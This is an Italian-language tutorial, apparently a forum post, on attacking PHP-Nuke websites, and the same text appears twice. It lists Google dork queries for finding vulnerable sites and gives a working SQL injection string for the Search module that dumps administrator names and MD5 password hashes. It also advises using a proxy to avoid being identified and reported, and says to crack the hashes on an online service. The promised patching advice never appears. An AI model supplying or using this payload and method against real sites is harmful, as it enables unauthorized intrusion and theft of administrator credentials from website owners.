In questa guida vi spiegherò come si attua l'SQL Injection sul modulo Search diun PHPNUKE e come patchare i vulnerabili!!!Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:"Powered by PhpNuke""allinurl:phpnuke/modules.php?name=Search""allinurl:html/modules.php?name=Search""inurl:modules.php?name=Search"Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringap0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*una volta inserita, clicchiamo INVIO, e vediamo il risultato...Se il sito è vulnerabile al bug, visualizzeremo risultati del tipod708cf4edf867f03e5fc2f510912fab1Contributo di "nome dell admin"Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40Argomento: (9 Commenti)dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e"nome dell admin" sarà il nick dell'amministratore...Ora il problema sarà... Come crackare la password in formato MD5?Facile.. basta andare su http://cracker.b4ck.net/ inserite il codice del bug e vi dirà la password dell admin
crack php nuke
In questa guida vi spiegherò come si attua l'SQL Injection sul modulo Search diun PHPNUKE e come patchare i vulnerabili!!!Per prima cosa dobbiamo trovare il PHPNUKE vulnerabile a questo tipo di SQL Injection, quindi andiamo su google e scriviamo una delle seguenti frasi:"Powered by PhpNuke""allinurl:phpnuke/modules.php?name=Search""allinurl:html/modules.php?name=Search""inurl:modules.php?name=Search"Una volta trovato il sito vulnerabile, apriremo il modulo Search, per vedere se è attivo...Per aprire il modulo Search, in mancanza del link, basta aggiungere "modules.php?name=Search"al phpnuke installato, ad esempio "www.sito.com/phpnuke/modules.php?name=Search" (senza apici).Una volta aperto il modulo Search,OVVIAMENTE PROXATI(senò scoprono il vostro IP e vi possono denunciare), inseriamo la seguente stringap0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*una volta inserita, clicchiamo INVIO, e vediamo il risultato...Se il sito è vulnerabile al bug, visualizzeremo risultati del tipod708cf4edf867f03e5fc2f510912fab1Contributo di "nome dell admin"Postato da 2 il Giovedì, 01 gennaio 2006 ore 12:40Argomento: (9 Commenti)dove "d708cf4edf867f03e5fc2f510912fab1" sarà la password criptata in formato MD5, e"nome dell admin" sarà il nick dell'amministratore...Ora il problema sarà... Come crackare la password in formato MD5?Facile.. basta andare su http://cracker.b4ck.net/ inserite il codice del bug e vi dirà la password dell admin